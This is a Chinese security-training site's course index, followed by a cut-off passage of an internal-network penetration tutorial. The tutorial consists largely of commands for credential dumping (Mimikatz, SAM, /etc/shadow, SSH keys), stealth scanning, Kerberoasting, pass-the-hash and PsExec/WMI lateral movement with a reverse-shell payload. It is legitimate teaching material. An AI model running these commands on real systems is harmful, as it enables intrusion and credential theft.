公开文集
0x01 信安之路安全产品
0x01 SRC 资产管理系统
001 企业资产有那些?
002 订阅最新 POC
003 IP 域名关联查询
004 公益权重数据
0x02 安全学习成长平台
001 成长平台视频参考
100 百分成就-学习心得-TOP 21 小伙伴
101 百分成就-学习心得-不想起床
102 百分成就-学习心得-不驚
103 百分成就-学习心得-aiDa0
104 百分成就-学习心得-起十二
105 百分成就-学习心得-Eyes
201 你为什么选择信安之路!
0x03 安全知识库
001 蜜罐运营专辑
0x04 自研蜜罐系统
0x02 Web 漏洞案例库
0x01 配置安全
001 header 安全配置
002 首页信息泄露
003 HTTP 访问控制 (CORS)
0x02 安全控制缺失
001 速率限制绕过
0x03 应用逻辑
0x03 小程序漏洞案例库
第一章:小程序渗透基础
1.1 微信小程序反编译与动态调试
1.2 微信小程序强制开启开发者模式
0x04 星球讨论知识问答
信息安全入门
学习方向选择
学习经验分享
安全产品研发
代码审计
物联网安全
APT
安全防御建设
安全建设经验
数据泄露监控
网络安全
终端安全
主机安全
产品安全
安全意识
数据安全
内部资产管理
安全管理
应急响应
网络安全架构
安全运营
业务安全
运维安全
渗透测试技术
信息收集
EXP/POC
web 测试
APP测试
内网渗透
0x05 代码审计小挑战
01 前端安全问题
101 script 标签下的 XSS
102 消息事件引发的 DOM XSS
104 常规评论 xss 漏洞
105 页面开放重定向漏洞
106 部分过滤的 xss 漏洞绕过
107 基于 DOM 的 XSS
108 CORS 配置错误
109 退出登录出 XSS
110 URL 重定向漏洞
111 CSRF 漏洞利用
112 JavaScript 代码注入
113 xss 绕过括号和反引号检测
02 文件操作类问题
201 Django 任意文件读取漏洞
202 php 后缀黑名单验证绕过上传
203 jsp 任意文件上传
204 jsp 代码中的 SSRF 漏洞
205 jsp 目录穿越漏洞
206 PHP文件包含漏洞
207 Django 本地文件包含
208 文件包含功能绕过
209 SSRF 跨服务端请求伪造
210 本地文件包含漏洞 windows
211 目录穿越漏洞
212 文件上传绕过
213 php 文件包含漏洞
03 注入类问题
301 由 SQL 注入引发的命令执行
302 php8 XML 实体注入
303 正则问题导致验证绕过
304 XPath 注入
305 典型认证 SQL 注入
306 数字型 SQL 注入
307 主机头(host header)注入
308 LDAP 注入
309 典型的万能密码漏洞
310 Ldap 注入漏洞代码
04 命令执行类问题
401 调用第三方工具时被劫持
402 原型污染导致命令执行
403 php array_map 代码执行
404 命令执行绕过检测
405 SSTI 模板注入
406 文件名注入 RCE
407 无防护命令执行
408 python eval 注入
409 绕过多个黑名单命令
05 业务逻辑类问题
501 django 认证 jwt 未验证 token
502 绕过权限检测执行命令
503 密码找回邮箱地址大小写绕过
504 DNS 重绑定问题
505 权限比对逻辑问题
506 越权访问其他用户的记录
507 用户注册问题
508 用户权限验证逻辑问题
509 PHP 判断两个变量相等逻辑问题
06 反序列化类问题
601 php 反序列化漏洞
602 python 反序列化漏洞
09 C语言问题
901 c 条件竞争
902 缓冲区溢出
903 通配符注入提权
0x99 AI 教你学安全
01-网络安全基础
Day-001-TCP-IP协议栈安全分析
Day-002-DNS协议安全与DNS劫持攻防
Day-003-IPv6 安全基础与过渡
Day-004-HTTP-HTTPS协议深度解析
Day-005-网络嗅探与流量分析技术
Day-006-防火墙原理与配置实践
Day-007-网络地址转换 NAT 安全分析
Day-008-路由协议安全 RIP-OSPF-BGP
Day-009-VLAN 安全与 VLAN-Hopping
Day-010-无线网络基础与安全 802.11
Day-011-网络访问控制 802.1X-NAC
Day-012-网络分段与微隔离设计
Day-013-负载均衡器安全配置
Day-014-CDN安全与防护
Day-015-NTP安全
Day-016-DHCP安全与攻击防护
Day-017-ICMP协议安全分析
Day-018-网络协议模糊测试基础
Day-019-网络流量基线建立
Day-020-网络取证基础
Day-021-网络入侵检测系统 NIDS
Day-022-网络入侵防御系统 NIPS
Day-023-网络流量加密与解密
Day-024-网络协议逆向工程基础
Day-025-网络性能与安全权衡
Day-026-SDN 安全
Day-027-网络虚拟化安全
Day-028-网络欺骗技术
Day-029-网络威胁情报应用
Day-030-网络容量规划与安全
Day-031-网络安全架构设计实战
02-Web 安全
Day-032-OWASP-Top-10-2021详解
Day-033-SQL 注入原理与手工检测
Day-034-SQL注入进阶报错注入与盲注
Day-035-XSS跨站脚本攻击基础
Day-036-XSS 进阶绕过与利用
Day-038-CSRF 跨站请求伪造
Day-039-文件上传漏洞
Day-040-反序列化漏洞基础
Day-041-PHP反序列化深入
Day-042-Java反序列化深入
Day-043-SSTI 服务端模板注入
Day-044-文件包含漏洞 LFI-RFI
Day-045-命令注入漏洞
Day-046-XXE-XML 外部实体注入
Day-047-反序列化漏洞进阶
Day-048-API 安全基础
Day-049-API认证与授权安全
Day-050-API漏洞挖掘实战
Day-051-文件上传漏洞进阶
Day-052-反序列化漏洞实战
Day-053-Web 安全综合实战
Day-054-移动安全基础
Day-055-Android 应用安全测试
Day-056-iOS 应用安全测试
Day-057-移动应用综合实战
Day-058-云安全基础
Day-059-AWS 安全实战
Day-060-Azure 安全实战
Day-061-GCP 安全实战
Day-062-云安全综合实战
Day-063-容器安全基础
Day-064-Docker 安全实战
Day-065-Kubernetes 安全实战
Day-066-容器安全综合实战
Day-067-API 安全进阶
Day-068-服务端请求伪造 SSRF 深入
Day-069-文件上传漏洞进阶
Day-070-反序列化漏洞实战进阶
Day-071-业务逻辑漏洞深入
Day-072-前端安全深入
Day-073-Web 安全综合实战
Day-074-云安全进阶
Day-075-移动安全进阶
Day-076-API 安全进阶
Day-077-前端安全进阶
Day-078-业务逻辑漏洞进阶
Day-079-反序列化漏洞实战进阶
Day-080-文件上传漏洞实战进阶
Day-081-SSTI 服务端模板注入进阶
Day-082-XXE-XML 外部实体注入进阶
Day-083-SSRF 服务端请求伪造进阶
Day-084-命令注入漏洞进阶
Day-085-文件包含漏洞进阶
Day-086-反序列化漏洞实战进阶
Day-087-文件上传漏洞实战进阶
Day-088-SSTI 服务端模板注入实战进阶
Day-089-XXE-XML 外部实体注入实战进阶
Day-090-SSRF 服务端请求伪造实战进阶
Day-091-命令注入漏洞实战进阶
Day-092-Web 安全综合实战
Day-093-GraphQL 安全
Day-094-JWT 与 OAuth2 安全
03-系统安全
Day-095-系统监控与检测
Day-096-主机防火墙配置
Day-097-系统审计与合规
Day-098-Linux 系统安全进阶
Day-099-Windows 系统安全进阶
Day-100-容器安全进阶
Day-101-容器编排安全进阶
Day-102-Linux 内核安全
Day-103-Windows 内核安全
Day-104-系统安全总结与实战
Day-105-Linux 系统安全基础
Day-106-Windows 系统安全基础
Day-107-容器安全基础
Day-108-系统加固技术
Day-109-日志分析技术
Day-110-威胁狩猎技术
04-应用安全
Day-111-安全编码规范
Day-112-输入验证技术
Day-113-输出编码技术
Day-114-错误处理安全
Day-115-会话管理安全
Day-116-认证安全
Day-117-授权安全
Day-118-数据保护安全
Day-119-日志安全
Day-120-API 安全
Day-121-微服务安全
Day-122-新兴技术安全概论
Day-123-DevSecOps 流水线安全
Day-124-云原生安全架构
Day-125-API 安全最佳实践
Day-126-安全编码规范
Day-127-SDL 安全开发生命周期
Day-128-威胁建模实战
Day-129-安全需求分析
Day-130-安全架构设计
Day-131-安全编码实践Java
Day-132-安全编码实践Python
Day-133-代码审计方法论
Day-134-静态代码分析SAST
Day-135-动态应用测试DAST
Day-136-交互式测试IAST
Day-137-软件成分分析SCA
Day-138-依赖漏洞管理
Day-139-安全测试自动化
Day-140-漏洞管理与响应
Day-142-OWASP-Top10-2024 详解
Day-143-CWE-Top25 分析
Day-144-漏洞挖掘方法论
Day-145-模糊测试技术
Day-146-逆向工程基础
Day-147-漏洞利用开发基础
Day-148-漏洞复现与验证
Day-149-漏洞披露流程
Day-150-CVE 申请与管理
Day-151-漏洞赏金计划
Day-152-等保2.0详解
Day-153-GDPR 合规实践
Day-154-数据安全法解读
Day-155-个人信息保护法与合规指南
Day-156-个人信息保护法解读
Day-157-ISO-27001 信息安全管理体系
Day-158-SOC-2 合规与审计
Day-159-PCI-DSS 支付卡行业数据安全标准
Day-160-网络安全审查办法解读
Day-161-数据出境安全评估办法
Day-162-应用安全评估实战
Day-163-红蓝对抗演练
Day-164-安全应急响应
Day-165-安全运营中心建设
Day-166-应用安全总结与展望
05-密码学
Day-167-密码学基础
Day-168-对称加密算法详解
Day-169-非对称加密算法详解
Day-170-哈希函数与数字签名
Day-171-密钥管理与PKI
Day-172-TLS-SSL 协议详解
Day-173-国密算法详解
Day-174-认证与密钥协议
Day-175-随机数生成与熵源
Day-176-椭圆曲线密码学详解
Day-177-后量子密码学详解
Day-178-高级密码学主题
Day-179-密码学行业应用精选
Day-180-常用加密算法原理与实现
Day-181-密码学总结与展望
06-渗透测试
Day-183-渗透测试方法论
Day-184-信息收集技术详解
Day-185-漏洞扫描技术详解
Day-186-漏洞利用技术详解
Day-187-渗透测试中的漏洞利用框架
Day-188-漏洞利用框架与 Metasploit 深入
Day-189-渗透测试中的 WAF 绕过技术
Day-190-渗透测试中的模糊测试技术
Day-191-渗透测试中的代码审计与静态分析
Day-192-渗透测试中的密码哈希破解技术
Day-193-渗透测试报告编写指南
Day-194-Web 应用渗透测试
Day-195-渗透测试中的 API 安全测试
Day-196-渗透测试中的 GraphQL 安全测试
Day-197-渗透测试中的前后端分离应用测试
Day-198-渗透测试中的小程序安全测试
Day-199-渗透测试中的浏览器安全测试
Day-200-OAuth-SSO安全测试
Day-201-渗透测试中的业务逻辑漏洞测试
Day-202-渗透测试中的厚客户端安全测试
Day-203-渗透测试综合实战演练
Day-204-内网渗透技术详解
Day-205-渗透测试中的内网信息收集进阶
Day-206-渗透测试中的域森林渗透技术
Day-207-渗透测试中的权限维持技术
Day-208-渗透测试中的横向移动技术
Day-209-渗透测试中的痕迹清理与反取证技术
Day-210-渗透测试中的数据窃取与 Exfiltration 技术
Day-211-渗透测试中的内部威胁与数据泄露测试
Day-212-渗透测试中的物理安全渗透
Day-213-社会工程学攻击技术
Day-214-移动应用渗透测试
Day-215-云安全渗透测试
Day-216-渗透测试中的容器与 Kubernetes 安全渗透
Day-217-渗透测试中的 Serverless 安全测试
Day-218-渗透测试中的微服务安全测试
Day-219-物联网安全渗透测试
Day-220-工业控制系统安全渗透测试
Day-221-无线网络安全渗透测试
Day-222-数据库安全渗透测试
Day-223-渗透测试中的供应链安全测试
Day-224-红队演练技术详解
Day-225-渗透测试中的红队基础设施搭建
Day-226-渗透测试中的威胁情报与狩猎
Day-227-渗透测试中的综合指纹识别技术
Day-228-自动化渗透测试技术
Day-229-渗透测试中的运维安全测试
Day-230-渗透测试中的区块链与智能合约安全测试
Day-231-渗透测试中的漏洞管理与修复验证
Day-232-渗透测试法律与合规
Day-233-后渗透攻击技术详解
Day-234-渗透测试中的人工智能应用
Day-235-漏洞利用开发深入
Day-236-云原生渗透测试深入
07-应急响应
Day-237-应急响应概述与核心概念
Day-238-应急响应流程框架
Day-239-CSIRT 团队组建与职责分工
Day-240-应急响应工具包准备
Day-241-应急响应法律与合规要求
Day-242-安全事件检测方法与指标
Day-243-云原生应急响应
Day-244-日志收集与分析技术
Day-245-网络流量分析与异常识别
Day-246-自动化响应与 SOAR
Day-247-端点监控与 EDR 技术
Day-248-威胁狩猎方法论
Day-249-威胁情报在检测中的应用
Day-250-数字取证基础与证据链管理
Day-251-内存取证技术
Day-252-磁盘取证与文件恢复
Day-253-网络取证与数据包分析
Day-254-云环境与容器取证
Day-255-恶意代码静态分析技术
Day-256-恶意代码动态分析技术
Day-257-恶意代码行为分析方法
Day-258-逆向工程基础与工具
Day-259-沙箱技术与自动化分析
Day-260-事件隔离与遏制策略
Day-261-威胁根除与系统修复
Day-262-系统恢复与数据重建
Day-263-业务连续性计划
Day-264-事件复盘与经验总结
Day-265-APT 攻击事件复盘分析
Day-266-勒索软件事件响应实战
Day-267-数据泄露事件处置流程
Day-268-内部威胁调查与取证
Day-269-综合应急响应演练
08-安全运维
Day-270-安全运营中心 SOC 概述
Day-271-安全监控指标体系
Day-272-安全告警管理
Day-273-安全可视化与仪表盘
Day-274-监控工具选型
Day-275-日志采集技术
Day-276-日志标准化与解析
Day-277-日志存储与归档
Day-278-日志分析技术
Day-279-日志合规要求
Day-280-SIEM 架构与设计
Day-281-关联规则引擎
Day-282-高级关联分析
Day-283-UEBA 用户实体行为分析
Day-284-威胁狩猎
Day-285-SOAR 基础概念
Day-286-剧本设计
Day-287-自动化响应技术
Day-288-安全工具集成
Day-289-SOAR 度量与优化
Day-290-安全基线管理
Day-291-漏洞管理流程
Day-292-补丁管理策略
Day-293-变更安全管理
Day-294-合规审计技术
Day-295-7x24 安全运营
Day-296-安全事件管理流程
Day-297-安全运营度量体系
Day-298-持续改进机制
Day-299-安全运维综合演练
Day-300-云原生安全运营
Day-301-AI 与机器学习安全运营
Day-302-安全自动化脚本实战
09-移动安全
Day-303-移动安全威胁概述
Day-304-移动设备安全架构
Day-305-移动操作系统安全模型
Day-306-移动应用权限管理
Day-307-移动端数据加密
Day-308-330-Android 安全合集
Day-309-Android 安全架构
Day-310-Android 组件安全
Day-311-Android 权限与隐私
Day-312-Android 逆向工程
Day-313-Android 应用加固
Day-314-iOS 安全架构
Day-315-iOS 应用沙盒机制
Day-316-越狱与反越狱
Day-317-iOS 逆向工程
Day-318-iOS 企业分发安全
Day-319-移动安全开发生命周期
Day-320-移动应用安全测试
Day-321-移动应用加固技术
Day-322-移动威胁防护
Day-323-移动安全合规
10-云安全
Day-324-云计算安全模型
Day-325-责任共担模型
Day-326-云安全威胁模型
Day-327-云安全合规框架
Day-328-云安全架构设计
Day-329-AWS IAM 安全
Day-330-AWS 网络安全
Day-331-AWS 存储安全
Day-332-AWS 安全监控
Day-333-AWS 安全最佳实践
Day-334-Azure AD 安全
Day-335-Azure 网络安全
Day-336-Azure 存储安全
Day-337-Azure 安全中心
Day-338-Azure 安全最佳实践
Day-339-容器安全基础
Day-340-Kubernetes 安全
Day-341-Serverless 安全
Day-342-云原生 DevSecOps
Day-343-云安全态势管理 CSPM
11-物联网工控
Day-344-物联网安全概述
Day-345-IoT 通信协议安全
Day-346-IoT 设备安全
Day-347-IoT 平台安全
Day-348-IoT 应用安全
Day-349-工业控制系统概述
Day-350-工控协议安全
Day-351-PLC 安全
Day-352-SCADA 系统安全
Day-353-工控安全防护
12-综合与总结
Day-354-安全职业发展路径
Day-355-安全技术趋势展望
Day-356-安全建设方法论
Day-357-经典攻防案例复盘
Day-358-安全学习资源指南
Day-359-信息安全行业求职指南
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Day-204-内网渗透技术详解
# Day 218: 内网渗透技术详解 > 渗透测试系列第 8 天 | 预计阅读时间:65 分钟 | 难度:★★★★★ --- ## 清单 目录 1. [内网渗透概述](#内网渗透概述) 2. [内网信息收集](#内网信息收集) 3. [网络拓扑发现](#网络拓扑发现) 4. [内网主机发现](#内网主机发现) 5. [内网协议分析](#内网协议分析) 6. [横向移动技术](#横向移动技术) 7. [域环境渗透](#域环境渗透) 8. [内网隧道技术](#内网隧道技术) 9. [内网持久化](#内网持久化) 10. [内网渗透实战案例](#内网渗透实战案例) 11. [内网渗透最佳实践](#内网渗透最佳实践) 12. [总结与思考](#总结与思考) 13. [参考资料](#参考资料) --- ## 内网渗透概述 ### 什么是内网渗透 内网渗透(Internal Network Penetration)是指在获取初始访问权限后,在企业内部网络中进行的深度渗透测试活动。 **内网渗透的核心定义**: ``` ┌─────────────────────────────────────────────────────────────┐ │ 内网渗透定义 │ ├─────────────────────────────────────────────────────────────┤ │ │ │ 内网渗透 = 信息收集 + 拓扑发现 + 横向移动 + 域渗透 │ │ │ │ 关键目标: │ │ 1. 网络测绘(Network Mapping) │ │ - 发现内网结构 │ │ - 识别关键资产 │ │ - 绘制网络拓扑 │ │ │ │ 2. 横向移动(Lateral Movement) │ │ - 在内网中移动 │ │ - 控制更多主机 │ │ - 扩大攻击面 │ │ │ │ 3. 权限提升(Privilege Escalation) │ │ - 本地提权 │ │ - 域权限提升 │ │ - 获取域控权限 │ │ │ │ 4. 数据收集(Data Collection) │ │ - 敏感数据定位 │ │ - 凭证收集 │ │ - 情报收集 │ │ │ └─────────────────────────────────────────────────────────────┘ ``` ### 内网渗透与外部渗透的区别 | 方面 | 外部渗透 | 内网渗透 | |------|----------|----------| | **起点** | 互联网 | 内网主机 | | **防御** | 防火墙、WAF | 内网分段、监控 | | **信任级别** | 低信任 | 高信任(内网互信) | | **攻击面** | 有限(开放端口) | 广泛(所有内网服务) | | **检测难度** | 较易检测 | 较难检测 | | **技术重点** | 漏洞利用 | 横向移动、域渗透 | ### 内网渗透流程 ``` ┌─────────────────────────────────────────────────────────────┐ │ 内网渗透流程 │ ├─────────────────────────────────────────────────────────────┤ │ │ │ 初始访问 → 信息收集 → 拓扑发现 → 横向移动 → 域渗透 │ │ ↓ ↓ ↓ ↓ ↓ │ │ Web Shell 主机信息 网络扫描 PtH/PtT DCSync │ │ 漏洞利用 凭证收集 路由发现 PsExec 黄金票据 │ │ 钓鱼邮件 端口扫描 信任关系 WMI 域管权限 │ │ │ │ 最终目标: │ │ ├── 控制域控制器 │ │ ├── 获取核心数据 │ │ ├── 建立持久化 │ │ └── 清理痕迹 │ │ │ └─────────────────────────────────────────────────────────────┘ ``` --- ## 内网信息收集 ### 主机信息收集 **Windows 主机信息**: ```powershell # 系统信息 systeminfo wmic os get Caption,Version,ServicePackVersionNumber wmic computersystem get Model,Manufacturer,Domain # 用户信息 whoami whoami /priv whoami /groups net users net localgroup administrators # 网络信息 ipconfig /all route print netstat -ano arp -a # 进程信息 tasklist /v tasklist /svc wmic process get name,processid,parentprocessid # 服务信息 sc query sc qc <service_name> wmic service get name,displayname,state # 补丁信息 systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"Hotfix" wmic qfe get Caption,Description,HotFixID,InstalledOn # 计划任务 schtasks /query /fo LIST /v ``` **Linux 主机信息**: ```bash # 系统信息 uname -a cat /etc/*release hostname uptime # 用户信息 whoami id w last cat /etc/passwd cat /etc/shadow # 需要 root # 网络信息 ifconfig -a ip addr show route -n netstat -tulpn ss -tulpn arp -a # 进程信息 ps aux ps -ef top -bn1 # 服务信息 systemctl list-units --type=service service --status-all chkconfig --list # 定时任务 crontab -l cat /etc/crontab ls -la /etc/cron.* ``` ### 凭证收集 **Windows 凭证**: ```powershell # 使用 Mimikatz meterpreter > load kiwi meterpreter > hashdump meterpreter > creds_all meterpreter > kerberos # 转储 LSASS mimikatz # sekurlsa::logonpasswords # 转储 SAM mimikatz # lsadump::sam # 转储 LSA Secrets mimikatz # lsadump::secrets # 转储缓存凭证 mimikatz # lsadump::cache # 使用 Windows 命令 $ reg save HKLM\SAM C:\temp\sam.hiv $ reg save HKLM\SYSTEM C:\temp\system.hiv $ impacket-secretsdump -sam sam.hiv -system system.hiv LOCAL ``` **Linux 凭证**: ```bash # 读取密码文件 $ cat /etc/passwd $ cat /etc/shadow # 需要 root # 查找 SSH 密钥 $ find / -name "id_rsa" 2>/dev/null $ find / -name "id_dsa" 2>/dev/null $ find / -name "*.pem" 2>/dev/null # 读取 SSH 密钥 $ cat ~/.ssh/id_rsa $ cat ~/.ssh/authorized_keys $ cat ~/.ssh/known_hosts # 历史命令 $ cat ~/.bash_history $ cat /root/.bash_history # 查找密码相关文本 $ grep -r "password" /home/ 2>/dev/null $ grep -r "passwd" /etc/ 2>/dev/null ``` ### 敏感数据定位 **Windows 敏感数据**: ```powershell # 查找敏感文件 $ dir /s *password* 2>$null $ dir /s *credential* 2>$null $ dir /s *.xlsx *.docx *.pdf 2>$null $ dir /s financial* budget* contract* 2>$null # 查找配置文件 $ dir /s web.config app.config *.json 2>$null $ type C:\Unattend.xml 2>$null $ type C:\Windows\Panther\Unattend\Unattend.xml 2>$null # 查找数据库文件 $ dir /s *.mdb *.accdb *.sql *.db 2>$null # 查找备份文件 $ dir /s *.bak *.backup *.old 2>$null ``` **Linux 敏感数据**: ```bash # 查找敏感文件 $ find / -name "*password*" 2>/dev/null $ find / -name "*credential*" 2>/dev/null $ find / -name "*.xlsx" -o -name "*.docx" -o -name "*.pdf" 2>/dev/null # 查找配置文件 $ find / -name "*.conf" -o -name "*.config" -o -name "*.json" 2>/dev/null $ cat /etc/mysql/my.cnf $ cat /etc/postgresql/*/main/postgresql.conf # 查找数据库文件 $ find / -name "*.sql" -o -name "*.db" -o -name "*.sqlite" 2>/dev/null # 查找 Web 目录 $ ls -la /var/www/ $ ls -la /home/*/public_html/ ``` --- ## 网络拓扑发现 ### 网络分段识别 ``` ┌─────────────────────────────────────────────────────────────┐ │ 网络分段识别 │ ├─────────────────────────────────────────────────────────────┤ │ │ │ 常见网段: │ │ ├── 办公网段:192.168.1.0/24 │ │ ├── 服务器网段:192.168.10.0/24 │ │ ├── 数据库网段:192.168.20.0/24 │ │ ├── 管理网段:192.168.100.0/24 │ │ ├── DMZ 网段:10.0.0.0/24 │ │ └── 无线网段:172.16.0.0/24 │ │ │ │ 识别方法: │ │ ├── 路由表分析 │ │ ├── ARP 缓存分析 │ │ ├── DNS 查询分析 │ │ └── 流量监控分析 │ │ │ └─────────────────────────────────────────────────────────────┘ ``` ### 路由发现 **Windows 路由发现**: ```powershell # 查看路由表 route print Get-NetRoute # 查看 ARP 缓存 arp -a Get-NetNeighbor # 查看网络连接 netstat -r netstat -ano # 追踪路由 tracert 192.168.1.1 tracert -d 192.168.10.1 # PowerShell 路由 Get-NetIPConfiguration Get-NetIPAddress ``` **Linux 路由发现**: ```bash # 查看路由表 route -n ip route show netstat -rn # 查看 ARP 缓存 arp -a ip neigh show # 查看网络连接 netstat -tulpn ss -tulpn # 追踪路由 traceroute 192.168.1.1 tracepath 192.168.1.1 mtr 192.168.1.1 ``` ### 网络拓扑绘制 **使用 Nmap 绘制拓扑**: ```bash # 发现存活主机 $ nmap -sn 192.168.1.0/24 # 扫描整个网段 $ nmap -sS -sV -O 192.168.1.0/24 # 扫描多个网段 $ nmap -sS 192.168.1.0/24 192.168.10.0/24 192.168.20.0/24 # 输出为 XML $ nmap -oX network.xml 192.168.1.0/24 # 使用 Zenmap 可视化 $ zenmap -t 192.168.1.0/24 ``` **使用 BloodHound 绘制域拓扑**: ```powershell # 收集域信息 $ .\SharpHound.exe -c All # 或使用 PowerShell $ Invoke-BloodHound -CollectionMethod All # 上传到 BloodHound # 打开 BloodHound Web 界面 # 上传收集到的 JSON 文件 # 分析域拓扑、信任关系、攻击路径 ``` --- ## 内网主机发现 ### 主机扫描技术 **ICMP 扫描**: ```bash # Ping 扫描 $ nmap -sn 192.168.1.0/24 # 快速 Ping 扫描 $ fping -a -g 192.168.1.0/24 # 多线程 Ping $ masscan -sn 192.168.1.0/24 --rate 1000 # PowerShell Ping $ 1..254 | ForEach-Object { ping -n 1 -w 100 192.168.1.$_ | Select-String "Reply" } ``` **端口扫描**: ```bash # TCP SYN 扫描 $ nmap -sS 192.168.1.0/24 # TCP Connect 扫描 $ nmap -sT 192.168.1.0/24 # UDP 扫描 $ nmap -sU 192.168.1.0/24 # 全端口扫描 $ nmap -p- 192.168.1.10 # 快速扫描 $ nmap -F 192.168.1.0/24 # 服务版本检测 $ nmap -sV 192.168.1.0/24 # 操作系统检测 $ nmap -O 192.168.1.0/24 # 综合扫描 $ nmap -sS -sV -O -sC 192.168.1.0/24 ``` **隐蔽扫描**: ```bash # 慢速扫描(避免检测) $ nmap -sS -T1 192.168.1.0/24 # 随机化扫描 $ nmap -sS --randomize-hosts 192.168.1.0/24 # 碎片包扫描 $ nmap -sS -f 192.168.1.0/24 # 源端口扫描 $ nmap -sS --source-port 53 192.168.1.0/24 # 诱饵扫描 $ nmap -sS -D RND:10 192.168.1.0/24 ``` ### 服务发现 **常见内网服务**: | 端口 | 服务 | 风险 | |------|------|------| | 21 | FTP | 明文传输、匿名访问 | | 22 | SSH | 弱密码、密钥复用 | | 23 | Telnet | 明文传输 | | 25 | SMTP | 开放中继 | | 53 | DNS | 区域传输 | | 80/443 | HTTP/HTTPS | Web 漏洞 | | 139/445 | SMB | 永恒之蓝、凭证泄露 | | 1433 | MSSQL | SA 弱密码 | | 3306 | MySQL | 弱密码、未授权 | | 3389 | RDP | 弱密码、蓝屏漏洞 | | 5432 | PostgreSQL | 弱密码 | | 5900 | VNC | 弱密码、未授权 | | 6379 | Redis | 未授权访问 | | 27017 | MongoDB | 未授权访问 | **服务指纹识别**: ```bash # Nmap 服务识别 $ nmap -sV 192.168.1.10 # 获取 Banner $ nc -v 192.168.1.10 80 GET / HTTP/1.0 # SSL 服务 $ openssl s_client -connect 192.168.1.10:443 # HTTP 头信息 $ curl -I http://192.168.1.10 ``` --- ## 内网协议分析 ### SMB 协议分析 **SMB 信息收集**: ```bash # 枚举 SMB 共享 $ crackmapexec smb 192.168.1.0/24 --shares # 匿名访问测试 $ smbclient -L //192.168.1.10 -N # 使用凭证访问 $ smbclient -L //192.168.1.10 -U username%password # 枚举用户 $ rpcclient -U "" -N 192.168.1.10 rpcclient $> enumdomusers # 查询域信息 $ rpcclient -U "domain/user%password" 192.168.1.10 rpcclient $> querydominfo rpcclient $> lsaquery ``` **SMB 漏洞检测**: ```bash # 检测 MS17-010 $ nmap -sS -p 445 --script=smb-vuln-ms17-010 192.168.1.0/24 # 检测其他 SMB 漏洞 $ nmap -sS -p 445 --script=smb-vuln-* 192.168.1.0/24 # 使用 CrackMapExec $ crackmapexec smb 192.168.1.0/24 --spider ``` ### LDAP 协议分析 **LDAP 信息收集**: ```bash # 匿名 LDAP 查询 $ ldapsearch -x -H ldap://192.168.1.10 -b "dc=corp,dc=local" # 使用凭证查询 $ ldapsearch -x -H ldap://192.168.1.10 -D "cn=admin,dc=corp,dc=local" -W -b "dc=corp,dc=local" # 枚举域用户 $ ldapsearch -x -H ldap://192.168.1.10 -b "dc=corp,dc=local" "(objectClass=user)" sAMAccountName # 枚举域计算机 $ ldapsearch -x -H ldap://192.168.1.10 -b "dc=corp,dc=local" "(objectClass=computer)" cn # 枚举组 $ ldapsearch -x -H ldap://192.168.1.10 -b "dc=corp,dc=local" "(objectClass=group)" cn ``` ### Kerberos 协议分析 **Kerberos 信息收集**: ```powershell # 查看当前票据 $ klist # 请求 TGT $ impacket-getTGT corp.local/Administrator:Password # 请求 TGS $ impacket-getST -spn "cifs/fileserver.corp.local" corp.local/Administrator # Kerberoasting $ impacket-GetUserSPNs corp.local/Administrator:Password -request # 使用 Rubeus $ Rubeus.exe kerberoast /outfile:hashes.txt ``` --- ## 横向移动技术 ### Pass-the-Hash **PtH 实施**: ```bash # 使用 Metasploit msf6 > use exploit/windows/smb/psexec msf6 > set RHOST 192.168.1.20 msf6 > set SMBUser Administrator msf6 > set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 msf6 > set PAYLOAD windows/meterpreter/reverse_tcp msf6 > exploit # 使用 Impacket $ impacket-psexec -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 Administrator@192.168.1.20 # 使用 CrackMapExec $ crackmapexec smb 192.168.1.20 -u Administrator -H 31d6cfe0d16ae931b73c59d7e0c089c0 -x "whoami" # 使用 WMIExec $ impacket-wmiexec -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 Administrator@192.168.1.20 ``` ### Pass-the-Ticket **PtT 实施**: ```powershell # 导出票据 mimikatz # kerberos::list /export # 注入票据 mimikatz # kerberos::ptt admin@CORP.LOCAL.kirbi # 使用 Rubeus $ Rubeus.exe ptt /ticket:admin.kirbi # 验证票据 $ klist $ klist tickets # 使用票据访问 $ psexec \\fileserver.corp.local cmd ``` ### PsExec 横向移动 ```bash # 使用 Impacket PsExec $ impacket-psexec Administrator@192.168.1.20 Password: P@ssw0rd123! # 使用 Windows PsExec $ psexec \\192.168.1.20 -u Administrator -p P@ssw0rd123! cmd # 使用 CrackMapExec $ crackmapexec smb 192.168.1.0/24 -u Administrator -p P@ssw0rd123! -x "whoami" # 批量执行 $ for ip in 192.168.1.{1..254}; do impacket-psexec Administrator@$ip cmd <<< "P@ssw0rd123!" 2>/dev/null && echo "Success: $ip"; done ``` ### WMI 横向移动 ```bash # 使用 Impacket WMIExec $ impacket-wmiexec Administrator@192.168.1.20 Password: P@ssw0rd123! # 使用 Metasploit msf6 > use exploit/windows/smb/wmi_exec msf6 > set RHOST 192.168.1.20 msf6 > set SMBUser Administrator msf6 > set SMBPass P@ssw0rd123! msf6 > exploit # 使用原生 WMI $ wmic /node:192.168.1.20 /user:Administrator /password:P@ssw0rd123! process call create "cmd.exe /c calc.exe" # PowerShell WMI $ Invoke-WmiMethod -ComputerName 192.168.1.20 -Class Win32_Process -Name Create -ArgumentList "cmd.exe" -Credential (Get-Credential) ``` ### DCOM 横向移动 ```powershell # 使用 PowerShell $ $com = [Type]::GetTypeFromProgID("Excel.Application","192.168.1.20") $ $excel = [System.Activator]::CreateInstance($com) $ $excel.Run("cmd.exe /c calc.exe") # 使用 Metasploit msf6 > use exploit/windows/dcerpc/mmc_exce msf6 > set RHOST 192.168.1.20 msf6 > exploit ``` ### SSH 横向移动 ```bash # 使用 SSH 密钥 $ ssh -i id_rsa user@192.168.1.20 # 使用密码 $ ssh user@192.168.1.20 Password: P@ssw0rd123! # 批量测试 $ for ip in 192.168.1.{1..254}; do ssh -o ConnectTimeout=1 -o StrictHostKeyChecking=no user@$ip "whoami" 2>/dev/null && echo "Success: $ip"; done # 使用私钥连接多台主机 $ for host in $(cat hosts.txt); do ssh -i id_rsa -o StrictHostKeyChecking=no user@$host "command" 2>/dev/null; done # SSH 隧道 $ ssh -L 8080:internal-server:80 user@gateway ``` --- ## 域环境渗透 ### 域信息收集 **PowerView 枚举**: ```powershell # 加载 PowerView $ Import-Module .\PowerView.ps1 # 获取域信息 $ Get-Domain $ Get-DomainController $ Get-DomainSID # 获取用户 $ Get-DomainUser $ Get-DomainUser -Identity admin $ 